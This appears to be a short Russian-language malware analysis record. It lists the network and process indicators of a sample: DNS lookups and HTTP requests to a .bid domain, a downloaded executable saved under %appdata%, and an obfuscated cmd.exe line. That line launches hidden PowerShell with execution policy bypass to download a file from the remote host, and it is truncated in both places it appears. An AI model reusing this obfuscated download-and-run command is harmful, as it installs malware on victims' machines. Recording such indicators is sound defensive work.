Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWeR^ShEl^l^.E^xE -exeCUtI^O^npO^licy BypAsS ^-^NOp^RofilE ^-^WiN^dOWs^T^Yle^ hi^ddEn (^NE^w^-^Ob^JecT s^YStE^M^.NET.weBCL^iEnt)^.DoWNL^OAD^f^Il^e^('http://asecwitlecn.b...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "POWeR^ShEl^l^.E^xE -exeCUtI^O^npO^licy BypAsS ^-^NOp^RofilE ^-^WiN^dOWs^T^Yle^ hi^ddEn (^NE^w^-^Ob^JecT s^YStE^M^.NET.weBCL^iEnt)^.DoWNL^OAD^f^Il^e^('http://asecwitlecn.b...' (со скрытым окном)